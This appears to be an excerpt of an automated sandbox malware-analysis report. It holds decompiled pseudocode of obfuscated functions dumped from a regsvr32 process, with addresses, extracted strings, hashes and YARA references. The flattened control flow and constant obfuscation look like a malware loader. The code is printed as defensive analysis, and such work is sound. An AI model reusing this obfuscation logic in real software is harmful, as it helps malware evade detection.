				_v88 = _v88 ^ 0x0002d8bd;
				_v112 = 0x376510;
				_v112 = _v112 >> 1;
				_v112 = _v112 + 0x6895;
				_v112 = _v112 ^ 0x001ca4c8;
				do {
					while(_t189 != 0x2d570bf) {
						if(_t189 == 0x2e69388) {
							_t174 = E04BA2BF0(_v80,  &_v60, _v92, _v116, _t215 + 0xc);
							_t219 =  &(_t219[3]);
							__eflags = _t174;
							if(__eflags != 0) {
								_t189 = 0xed0c1fc;
								continue;
							}
						} else {
							if(_t189 == 0xa1356c9) {
								_t177 = E04BA2BF0(_v140,  &_v60, _v84, _v124, _t215 + 0x48);
								_t219 =  &(_t219[3]);
								__eflags = _t177;
								if(__eflags != 0) {
									_t189 = 0x2e69388;
									continue;
								}
							} else {
								if(_t189 == 0xd5f0997) {
									__eflags = E04B99D3E( &_v60, _v88, __eflags, _v112, _t215);
									_t216 =  !=  ? 1 : _t216;
								} else {
									if(_t189 == 0xe0c62fa) {
										_t189 = 0xe1d6fcd;
										continue;
									} else {
										if(_t189 == 0xe1d6fcd) {
											E04B822A6(_a4, _v120,  &_v60, _v100);
											_t219 =  &(_t219[2]);
											_t189 = 0xa1356c9;
											continue;
										} else {
											if(_t189 != 0xed0c1fc) {
												goto L19;
											} else {
												_t182 = E04BA2BF0(_v132,  &_v60, _v128, _v108, _t215 + 0x1c);
												_t219 =  &(_t219[3]);
												if(_t182 != 0) {
													_t189 = 0x2d570bf;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L22:
						return _t216;
					}
					_t172 = E04BA2BF0(_v136,  &_v60, _v96, _v104, _t215 + 0x3c);
					_t219 =  &(_t219[3]);
					__eflags = _t172;
					if(__eflags == 0) {
						_t189 = 0x63acd9;
						goto L19;
					} else {
						_t189 = 0xd5f0997;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t189 - 0x63acd9;
				} while (__eflags != 0);
				goto L22;
			}

0x04b98810
0x04b98817
0x04b98818
0x04b9881f
0x04b98820
0x04b98821
0x04b98826
0x04b9882e
0x04b98831
0x04b98839
0x04b9883b
0x04b98841
0x04b98845
0x04b9884a
0x04b98858
0x04b9885d
0x04b98863
0x04b98868
0x04b98870
0x04b9887d
0x04b98880
0x04b98884
0x04b9888c
0x04b98899
0x04b9889d
0x04b988aa
0x04b988ae
0x04b988b6
0x04b988be
0x04b988c6
0x04b988ce
0x04b988d6
0x04b988de
0x04b988ee
0x04b988f2
0x04b988fa
0x04b98902
0x04b9890a
0x04b98912
0x04b9891a
0x04b98922
0x04b9892a
0x04b98932
0x04b98937
0x04b9893f
0x04b98947
0x04b9894f
0x04b98957
0x04b98964
0x04b98965
0x04b98969
0x04b98971
0x04b9897f
0x04b98983
0x04b9898b
0x04b98993
0x04b9899b
0x04b989a8
0x04b989ac
0x04b989b4
0x04b989c4
0x04b989d1
0x04b989d5
0x04b989d9
0x04b989de
0x04b989e6
0x04b989ee
0x04b989f6
0x04b989fe
0x04b98a06
0x04b98a0b
0x04b98a13
0x04b98a1b
0x04b98a23
0x04b98a2b
0x04b98a33
0x04b98a37
0x04b98a3f
0x04b98a47
0x04b98a47
0x04b98a51
0x04b98b22
0x04b98b27
0x04b98b2a
0x04b98b2c
0x04b98b2e
0x00000000
0x04b98b2e
0x04b98a57
0x04b98a5d
0x04b98af7
0x04b98afc
0x04b98aff
0x04b98b01
0x04b98b07
0x00000000
0x04b98b07
0x04b98a63
0x04b98a69
0x04b98b8c
0x04b98b8e
0x04b98a6f
0x04b98a75
0x04b98ad9
0x00000000
0x04b98a77
0x04b98a7d
0x04b98ac7
0x04b98acc
0x04b98acf
0x00000000
0x04b98a7f
0x04b98a85
0x00000000
0x04b98a8b
0x04b98a9f
0x04b98aa4
0x04b98aa9
0x04b98aaf
0x00000000
0x04b98aaf
0x04b98aa9
0x04b98a85
0x04b98a7d
0x04b98a75
0x04b98a69
0x04b98a5d
0x04b98b92
0x04b98b9d
0x04b98b9d
0x04b98b4c
0x04b98b51
0x04b98b54
0x04b98b56
0x04b98b62
0x00000000
0x04b98b58
0x04b98b58
0x00000000
0x04b98b58
0x00000000
0x04b98b67
0x04b98b67
0x04b98b67
0x00000000

Strings

$P, xrefs: 04B9880E
>_), xrefs: 04B98912
Eh}, xrefs: 04B988FA
\:, xrefs: 04B98937
i*, xrefs: 04B988CE
d%, xrefs: 04B9898B

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$>_)$Eh}$\:$d%$i*
API String ID: 0-2969320698
Opcode ID: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction ID: f1014039d9f0be9d26e1d3cfb7a10d243fc3ef062895ae15b5c96105b3aa984f
Opcode Fuzzy Hash: aeffe686daea30544195ed0138f6e4945c8625af026a6e1ad50bc3102dfd4890
Instruction Fuzzy Hash: E19166711083019FDB18DF21C58592BBBE1EFC5708F04896DF59A96260D3B6EA0ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 04B8BFBE, Relevance: 7.6, Strings: 6, Instructions: 149
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E04B8BFBE(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* __ecx;
				void* _t131;
				signed int _t135;
				signed int _t139;
				void* _t143;
				void* _t146;
				void* _t157;
				signed int _t158;
				signed int _t159;
				void* _t161;
				signed int* _t163;

				_t144 = _a4;
				_push(_a8);
				_t161 = __edx;
				_push(_a4);
				_push(__edx);
				E04B9FE29(_t131);
				_v56 = 0x2e7fee;
				_t163 =  &(( &_v68)[4]);
				_v56 = _v56 | 0x8bf0d90c;
				_v56 = _v56 + 0xffff841c;
				_t157 = 0;
				_v56 = _v56 ^ 0x8bfe8408;
				_t146 = 0xe8f06a4;
				_v20 = 0xd3cae8;
				_v20 = _v20 + 0xffff2712;
				_v20 = _v20 ^ 0x00d2f1ea;
				_v16 = 0xd3a0fd;
				_t158 = 0x75;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x4001cf0d;
				_v40 = 0x4f1d62;
				_v40 = _v40 + 0xffffc4cc;
				_v40 = _v40 + 0xffffbca6;
				_v40 = _v40 ^ 0x004e2d6a;
				_v8 = 0x24ed33;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x1279d784;
				_v12 = 0xe170a7;
				_t135 = _v12;
				_t159 = 0x28;
				_t155 = _t135 % _t159;
				_v12 = _t135 / _t159;
				_v12 = _v12 ^ 0x0006bc2e;
				_v44 = 0x4d8c8f;
				_v44 = _v44 | 0xffeffd4f;
				_v44 = _v44 ^ 0xffe079b2;
				_v48 = 0xc3edaa;
				_v48 = _v48 >> 0x10;
				_v48 = _v48 + 0xd49e;
				_v48 = _v48 ^ 0x0004c7fe;
				_v68 = 0x67444f;
				_v68 = _v68 + 0x90d;
				_v68 = _v68 * 0x5b;
				_v68 = _v68 | 0x263824b0;
				_v68 = _v68 ^ 0x26bf9150;
				_v52 = 0xb09b3a;
				_v52 = _v52 ^ 0xfa5715e4;
				_v52 = _v52 ^ 0xfae78c15;
				_v24 = 0xeb1207;
				_v24 = _v24 + 0xffffe226;
				_v24 = _v24 ^ 0x00e7632f;
				_v28 = 0x3b6554;
				_v28 = _v28 ^ 0x4e84398c;
				_v28 = _v28 ^ 0x4eb32e0d;
				_v60 = 0x36daca;
				_v60 = _v60 ^ 0xae85a6ca;
				_v60 = _v60 ^ 0x532e6d02;
				_v60 = _v60 ^ 0xfd946988;
				_v64 = 0xe9416a;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 >> 1;
				_v64 = _v64 ^ 0x000bb9db;
				_v32 = 0xb764c3;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0xd93a5796;
				_v4 = 0xb5f3f2;
				_v4 = _v4 ^ 0xf880d4e7;
				_v4 = _v4 ^ 0xf834d19c;
				_t160 = _v4;
				_v36 = 0x2d4acf;
				_v36 = _v36 | 0x966edff9;
				_v36 = _v36 ^ 0x966c13d3;
				do {
					while(_t146 != 0x2926179) {
						if(_t146 == 0x8f0c602) {
							E04BA1538(_v4, _v36, _t160);
						} else {
							if(_t146 == 0xb296bf4) {
								_t143 = E04B9C41A(_v24, _t155, _v28,  *_t144, _v60, _t160, _t144 + 4, _v64, _v32,  *((intOrPtr*)(_t144 + 4)));
								_t163 =  &(_t163[8]);
								_t157 = _t143;
								_t146 = 0x8f0c602;
								continue;
							} else {
								if(_t146 != 0xe8f06a4) {
									goto L10;
								} else {
									_t146 = 0x2926179;
									continue;
								}
							}
						}
						L13:
						return _t157;
					}
					_t155 = _v40;
					_t139 = E04BA45CA(_t161, _v40, _t146, _t146, _v8, _v12, _v44, _v16, _v48, _v68, _v20, _v52, _v56, 0);
					_t160 = _t139;
					_t163 =  &(_t163[0xc]);
					if(_t139 == 0xffffffff) {
						_t146 = 0xe2d92d;
						goto L10;
					} else {
						_t146 = 0xb296bf4;
						continue;
					}
					goto L13;
					L10:
				} while (_t146 != 0xe2d92d);
				goto L13;
			}

0x04b8bfc2
0x04b8bfc9
0x04b8bfcd
0x04b8bfcf
0x04b8bfd0
0x04b8bfd2
0x04b8bfd7
0x04b8bfdf
0x04b8bfe2
0x04b8bfec
0x04b8bff4
0x04b8bff6
0x04b8bffe
0x04b8c003
0x04b8c00b
0x04b8c013
0x04b8c01b
0x04b8c029
0x04b8c02e
0x04b8c034
0x04b8c03c
0x04b8c044
0x04b8c04c
0x04b8c054
0x04b8c05c
0x04b8c064
0x04b8c069
0x04b8c071
0x04b8c079
0x04b8c07d
0x04b8c07e
0x04b8c080
0x04b8c084
0x04b8c08c
0x04b8c094
0x04b8c09c
0x04b8c0a4
0x04b8c0ac
0x04b8c0b1
0x04b8c0b9
0x04b8c0c1
0x04b8c0c9
0x04b8c0d6
0x04b8c0da
0x04b8c0e2
0x04b8c0ea
0x04b8c0fa
0x04b8c102
0x04b8c10a
0x04b8c112
0x04b8c11a
0x04b8c122
0x04b8c12a
0x04b8c132
0x04b8c13a
0x04b8c142
0x04b8c14a
0x04b8c152
0x04b8c15a
0x04b8c162
0x04b8c167
0x04b8c16b
0x04b8c173
0x04b8c17b
0x04b8c180
0x04b8c188
0x04b8c190
0x04b8c198
0x04b8c1a0
0x04b8c1a4
0x04b8c1ac
0x04b8c1b4
0x04b8c1bc
0x04b8c1bc
0x04b8c1ca
0x04b8c27c
0x04b8c1d0
0x04b8c1d6
0x04b8c208
0x04b8c20d
0x04b8c210
0x04b8c212
0x00000000
0x04b8c1d8
0x04b8c1de
0x00000000
0x04b8c1e4
0x04b8c1e4
0x00000000
0x04b8c1e4
0x04b8c1de
0x04b8c1d6
0x04b8c282
0x04b8c28b
0x04b8c28b
0x04b8c23f
0x04b8c247
0x04b8c24c
0x04b8c24e
0x04b8c254
0x04b8c260
0x00000000
0x04b8c256
0x04b8c256
0x00000000
0x04b8c256
0x00000000
0x04b8c265
0x04b8c265
0x00000000

Strings

jA, xrefs: 04B8C15A
3$, xrefs: 04B8C05C
/c, xrefs: 04B8C11A
j-N, xrefs: 04B8C054
ODg, xrefs: 04B8C0C1
Te;, xrefs: 04B8C122

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /c$3$$ODg$Te;$j-N$jA
API String ID: 0-1439100758
Opcode ID: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction ID: c7984ff7f062a7a8236c02e2a8c2f6f2047823dfbf0ba63ef0d9558cd8a7ae14
Opcode Fuzzy Hash: 6beecac5511420f763a8f2b06641e78c47f08b7496e3c8d03a53748897a012dd
Instruction Fuzzy Hash: 156144B10183409FC798DFA5D88A81BBFF1FBC5318F405A1DF6D696260C3B59A19CB52

Uniqueness

Uniqueness Score: -1.00%

Function 100167D5, Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E100167D5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10057a08; // 0xe86d94f5
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1005afc0 = _t6;
				 *0x1005afbc = _t22;
				 *0x1005afb8 = _t25;
				 *0x1005afb4 = _t21;
				 *0x1005afb0 = _t27;
				 *0x1005afac = _t26;
				 *0x1005afd8 = ss;
				 *0x1005afcc = cs;
				 *0x1005afa8 = ds;
				 *0x1005afa4 = es;
				 *0x1005afa0 = fs;
				 *0x1005af9c = gs;
				asm("pushfd");
				_pop( *0x1005afd0);
				 *0x1005afc4 =  *_t31;
				 *0x1005afc8 = _v0;
				 *0x1005afd4 =  &_a4;
				 *0x1005af10 = 0x10001;
				_t11 =  *0x1005afc8; // 0x0
				 *0x1005aec4 = _t11;
				 *0x1005aeb8 = 0xc0000409;
				 *0x1005aebc = 1;
				_t12 =  *0x10057a08; // 0xe86d94f5
				_v812 = _t12;
				_t13 =  *0x10057a0c; // 0x17926b0a
				_v808 = _t13;
				 *0x1005af08 = IsDebuggerPresent();
				_push(1);
				E100227FB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1002b434);
				if( *0x1005af08 == 0) {
					_push(1);
					E100227FB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167d5
0x100167db
0x100167dd
0x100167dd
0x1001c395
0x1001c39a
0x1001c3a0
0x1001c3a6
0x1001c3ac
0x1001c3b2
0x1001c3b8
0x1001c3bf
0x1001c3c6
0x1001c3cd
0x1001c3d4
0x1001c3db
0x1001c3e2
0x1001c3e3
0x1001c3ec
0x1001c3f4
0x1001c3fc
0x1001c407
0x1001c411
0x1001c416
0x1001c41b
0x1001c425
0x1001c42f
0x1001c434
0x1001c43a
0x1001c43f
0x1001c44b
0x1001c450
0x1001c452
0x1001c45a
0x1001c465
0x1001c472
0x1001c474
0x1001c476
0x1001c47b
0x1001c48f

APIs

IsDebuggerPresent.KERNEL32 ref: 1001C445
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001C45A
UnhandledExceptionFilter.KERNEL32(1002B434), ref: 1001C465
GetCurrentProcess.KERNEL32(C0000409), ref: 1001C481
TerminateProcess.KERNEL32(00000000), ref: 1001C488

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction ID: 29b7c1aed7e77d05a339182a33a9266dca5d513d51f4b37265af4c9016ee4a47
Opcode Fuzzy Hash: 7284fa7d50281a3c049889d49720807c61de6750ecda71a27977002e3826e049
Instruction Fuzzy Hash: 0021B0B4408328DFE701DFA9EDC96487BB0FB0A315F50406AE508873A1E7B459C2CF55

Uniqueness

Uniqueness Score: -1.00%

Function 04B92142, Relevance: 6.6, Strings: 5, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B92142() {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				unsigned int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t368;
				intOrPtr _t378;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t389;
				void* _t390;
				void* _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				intOrPtr _t438;
				intOrPtr _t439;
				intOrPtr _t441;
				void* _t444;
				signed int _t446;
				signed int* _t448;

				_t448 =  &_v160;
				_v16 = 0x961399;
				_v12 = 0x301936;
				_v8 = 0xe566e6;
				_t391 = 0;
				_t444 = 0x374f925;
				_v4 = _v4 & 0;
				_v108 = 0x7426fd;
				_v108 = _v108 + 0xfffff8c3;
				_t393 = 0x2b;
				_v108 = _v108 / _t393;
				_v108 = _v108 ^ 0x0002b357;
				_v156 = 0x38452;
				_v156 = _v156 + 0x4117;
				_t394 = 0x21;
				_v156 = _v156 * 0x30;
				_v156 = _v156 + 0xffff7c1f;
				_v156 = _v156 ^ 0x00b47fcf;
				_v152 = 0x5ef941;
				_v152 = _v152 * 0x43;
				_v152 = _v152 >> 7;
				_v152 = _v152 << 6;
				_v152 = _v152 ^ 0x0c6d9e00;
				_v120 = 0x18b538;
				_v120 = _v120 * 0x11;
				_v120 = _v120 + 0xffffc33e;
				_v120 = _v120 >> 0xd;
				_v120 = _v120 ^ 0x00000d1e;
				_v112 = 0x5e5e29;
				_v112 = _v112 + 0x9b22;
				_v112 = _v112 / _t394;
				_v112 = _v112 ^ 0x0002e0c4;
				_v144 = 0x808e79;
				_v144 = _v144 | 0xf9cc6bdf;
				_v144 = _v144 + 0xffff3e00;
				_v144 = _v144 << 0xf;
				_v144 = _v144 ^ 0x16ff716d;
				_v28 = 0xba41b5;
				_v28 = _v28 + 0xffffb1dd;
				_v28 = _v28 ^ 0x00b49e8e;
				_v68 = 0x38cb33;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x000b8367;
				_v44 = 0xd85990;
				_v44 = _v44 ^ 0x9ad510f8;
				_v44 = _v44 ^ 0x9a039936;
				_v104 = 0xf87474;
				_t395 = 0x22;
				_v104 = _v104 / _t395;
				_v104 = _v104 >> 7;
				_v104 = _v104 ^ 0x000753f7;
				_v36 = 0x3be84a;
				_v36 = _v36 << 6;
				_v36 = _v36 ^ 0x0ef6677c;
				_v128 = 0x4404d4;
				_v128 = _v128 ^ 0xb10c689b;
				_t396 = 0x5e;
				_v128 = _v128 / _t396;
				_v128 = _v128 ^ 0x298e6a61;
				_v128 = _v128 ^ 0x28610484;
				_v80 = 0xdf65bd;
				_t397 = 0x7c;
				_v80 = _v80 / _t397;
				_v80 = _v80 ^ 0x00023fe8;
				_v96 = 0x7747b3;
				_v96 = _v96 << 0xd;
				_t398 = 0x29;
				_v96 = _v96 * 0x16;
				_v96 = _v96 ^ 0x052c7385;
				_v88 = 0xae51fb;
				_v88 = _v88 + 0x359a;
				_v88 = _v88 | 0x8b717ce6;
				_v88 = _v88 ^ 0x8bfa7840;
				_v24 = 0xcaf683;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x00013e33;
				_v52 = 0xefed62;
				_v52 = _v52 | 0x058c509b;
				_v52 = _v52 ^ 0x05e11655;
				_v160 = 0xbd94ea;
				_v160 = _v160 + 0x2a3a;
				_v160 = _v160 >> 5;
				_v160 = _v160 + 0x96e3;
				_v160 = _v160 ^ 0x0003401d;
				_v72 = 0x73d84b;
				_v72 = _v72 + 0x3d83;
				_v72 = _v72 ^ 0x007dedc2;
				_v76 = 0xd9453f;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x006ac7af;
				_v140 = 0x85d58e;
				_v140 = _v140 * 0x2c;
				_v140 = _v140 >> 4;
				_v140 = _v140 / _t398;
				_v140 = _v140 ^ 0x000cf91a;
				_v100 = 0x1458f8;
				_v100 = _v100 ^ 0xd74f5ef9;
				_t399 = 0x5f;
				_v100 = _v100 / _t399;
				_v100 = _v100 ^ 0x0247f1d9;
				_v64 = 0x476ab5;
				_v64 = _v64 + 0xffff3492;
				_v64 = _v64 ^ 0x004c13d1;
				_v148 = 0x4dca07;
				_v148 = _v148 + 0xffff4a4e;
				_v148 = _v148 + 0xffff2093;
				_v148 = _v148 ^ 0x004c8279;
				_v136 = 0xa6ed90;
				_v136 = _v136 >> 2;
				_v136 = _v136 | 0x950d13bb;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x000e92a5;
				_v60 = 0xea20ae;
				_v60 = _v60 * 0x5d;
				_v60 = _v60 ^ 0x550aff98;
				_v92 = 0xe3a2d4;
				_v92 = _v92 >> 6;
				_v92 = _v92 * 0x28;
				_v92 = _v92 ^ 0x008d85d0;
				_v132 = 0x9d5db8;
				_v132 = _v132 + 0xffff1bd6;
				_t400 = 0x1b;
				_v132 = _v132 / _t400;
				_v132 = _v132 << 0xa;
				_v132 = _v132 ^ 0x17217366;
				_v56 = 0xa7c0ff;
				_t401 = 0x35;
				_v56 = _v56 / _t401;
				_v56 = _v56 ^ 0x000623f9;
				_v116 = 0xf9a70;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 >> 5;
				_v116 = _v116 + 0xffffd532;
				_v116 = _v116 ^ 0xfff34a0b;
				_v124 = 0xd1e957;
				_v124 = _v124 << 3;
				_t402 = 0x76;
				_v124 = _v124 / _t402;
				_v124 = _v124 + 0x1a27;
				_v124 = _v124 ^ 0x000dfee3;
				_v84 = 0x8b01d8;
				_t403 = 0x34;
				_v84 = _v84 * 0x70;
				_v84 = _v84 / _t403;
				_v84 = _v84 ^ 0x0120e28f;
				_v32 = 0xcb988c;
				_v32 = _v32 ^ 0x945cb942;
				_v32 = _v32 ^ 0x9495c850;
				_v40 = 0x79d8e1;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x000c7724;
				_v48 = 0xc03196;
				_v48 = _v48 ^ 0x1279a3f1;
				_v48 = _v48 ^ 0x12baef9a;
				while(1) {
					L1:
					_t368 = 0x9ae396c;
					do {
						L2:
						if(_t444 == 0x19911bc) {
							_push(_v52);
							_push(_v24);
							_push(_v88);
							_t446 = E04B9E1F8(0x4b81a20, _v96, __eflags);
							__eflags = E04B8738A(_v160, _t446, _v72, _v108,  &_v20, 0, _v76) - _v156;
							_t403 = _t446;
							_t444 =  ==  ? 0x9ae396c : 0x7737a40;
							E04B9FECB(_t403, _v140, _v100, _v64, _v148);
							_t448 =  &(_t448[0xb]);
							_t368 = 0x9ae396c;
							goto L12;
						}
						if(_t444 == 0x374f925) {
							_push(_t403);
							_push(_t403);
							_t378 = E04B8C5D8(0x44);
							 *0x4ba6220 = _t378;
							 *((intOrPtr*)(_t378 + 0x28)) = 0x4000;
							_t383 =  *0x4ba6220; // 0x0
							_t384 = E04B8C5D8( *((intOrPtr*)(_t383 + 0x28)));
							_t438 =  *0x4ba6220; // 0x0
							_t448 =  &(_t448[4]);
							_t444 = 0x19911bc;
							_t403 =  *((intOrPtr*)(_t438 + 0x28)) + _t384;
							 *((intOrPtr*)(_t438 + 0x24)) = _t384;
							 *((intOrPtr*)(_t438 + 0x14)) = _t384;
							 *((intOrPtr*)(_t438 + 0x1c)) = _t384;
							 *(_t438 + 0x20) = _t403;
							while(1) {
								L1:
								_t368 = 0x9ae396c;
								goto L2;
							}
						}
						if(_t444 == 0x7737a40) {
							_t439 =  *0x4ba6220; // 0x0
							E04BA2B09(_v116,  *((intOrPtr*)(_t439 + 0x24)), _v124, _v84);
							_t441 =  *0x4ba6220; // 0x0
							E04BA2B09(_v32, _t441, _v40, _v48);
							L16:
							return _t391;
						}
						if(_t444 == 0x9042860) {
							E04B8F7FE(_v132, _v20, _v56, _v112);
							goto L16;
						}
						if(_t444 != _t368) {
							goto L12;
						}
						_t389 =  *0x4ba6220; // 0x0
						_t403 = _v20;
						_t390 = E04B98B9E(_t403, _v152, _v136, _v60,  *((intOrPtr*)(_t389 + 0x28)),  *((intOrPtr*)(_t389 + 0x24)), _v92);
						_t448 =  &(_t448[5]);
						if(_t390 != _v120) {
							_t444 = 0x7737a40;
						} else {
							_t444 = 0x9042860;
							_t391 = 1;
						}
						goto L1;
						L12:
						__eflags = _t444 - 0xe3acfc2;
					} while (__eflags != 0);
					goto L16;
				}
			}

0x04b92142
0x04b92148
0x04b92155
0x04b92160
0x04b9216f
0x04b92171
0x04b92176
0x04b9217d
0x04b92185
0x04b92193
0x04b92198
0x04b9219e
0x04b921a6
0x04b921ae
0x04b921bb
0x04b921be
0x04b921c2
0x04b921ca
0x04b921d2
0x04b921df
0x04b921e3
0x04b921e8
0x04b921ed
0x04b921f5
0x04b92202
0x04b92206
0x04b9220e
0x04b92213
0x04b9221b
0x04b92223
0x04b92233
0x04b92237
0x04b9223f
0x04b92247
0x04b9224f
0x04b92257
0x04b9225c
0x04b92264
0x04b9226f
0x04b9227a
0x04b92285
0x04b9228d
0x04b92292
0x04b9229a
0x04b922a5
0x04b922b0
0x04b922bb
0x04b922c7
0x04b922cc
0x04b922d2
0x04b922d7
0x04b922df
0x04b922ea
0x04b922f2
0x04b922fd
0x04b92305
0x04b92311
0x04b92314
0x04b92318
0x04b92320
0x04b9232a
0x04b92338
0x04b9233d
0x04b92343
0x04b9234b
0x04b92353
0x04b9235d
0x04b92360
0x04b92364
0x04b9236c
0x04b92374
0x04b9237c
0x04b92384
0x04b9238c
0x04b92397
0x04b9239f
0x04b923aa
0x04b923b5
0x04b923c0
0x04b923cb
0x04b923d3
0x04b923db
0x04b923e0
0x04b923e8
0x04b923f0
0x04b923f8
0x04b92400
0x04b92408
0x04b92410
0x04b92414
0x04b9241c
0x04b92429
0x04b9242d
0x04b9243a
0x04b9243e
0x04b92446
0x04b9244e
0x04b9245a
0x04b9245d
0x04b92461
0x04b92469
0x04b92471
0x04b92479
0x04b92481
0x04b92489
0x04b92499
0x04b924a1
0x04b924a9
0x04b924b1
0x04b924b6
0x04b924be
0x04b924c3
0x04b924cb
0x04b924d8
0x04b924dc
0x04b924e4
0x04b924ec
0x04b924f6
0x04b924fa
0x04b92502
0x04b9250a
0x04b9251f
0x04b92524
0x04b9252a
0x04b9252f
0x04b92537
0x04b92543
0x04b92548
0x04b9254e
0x04b92556
0x04b9255e
0x04b92563
0x04b92568
0x04b92570
0x04b92578
0x04b92580
0x04b92589
0x04b9258e
0x04b92594
0x04b9259c
0x04b925a4
0x04b925b1
0x04b925b2
0x04b925bc
0x04b925c0
0x04b925c8
0x04b925d3
0x04b925de
0x04b925e9
0x04b925f4
0x04b925fc
0x04b92607
0x04b92612
0x04b9261d
0x04b92628
0x04b92628
0x04b92628
0x04b9262d
0x04b9262d
0x04b92633
0x04b92710
0x04b92719
0x04b92720
0x04b92731
0x04b9275d
0x04b9276b
0x04b9276d
0x04b92778
0x04b9277d
0x04b92780
0x00000000
0x04b92780
0x04b9263f
0x04b926b4
0x04b926b5
0x04b926b8
0x04b926bd
0x04b926c5
0x04b926df
0x04b926e7
0x04b926ec
0x04b926f2
0x04b926f5
0x04b926fd
0x04b926ff
0x04b92702
0x04b92705
0x04b92708
0x04b92628
0x04b92628
0x04b92628
0x00000000
0x04b92628
0x04b92628
0x04b92643
0x04b927b7
0x04b927c4
0x04b927d7
0x04b927e4
0x04b927ef
0x04b927f8
0x04b927f8
0x04b9264f
0x04b927a6
0x00000000
0x04b927ac
0x04b92657
0x00000000
0x00000000
0x04b92661
0x04b9267b
0x04b92682
0x04b92687
0x04b9268e
0x04b9269a
0x04b92690
0x04b92692
0x04b92697
0x04b92697
0x00000000
0x04b92785
0x04b92785
0x04b92785
0x00000000
0x04b92791

Strings

J;, xrefs: 04B922DF
)^^, xrefs: 04B9221B
b, xrefs: 04B923AA
f, xrefs: 04B92160
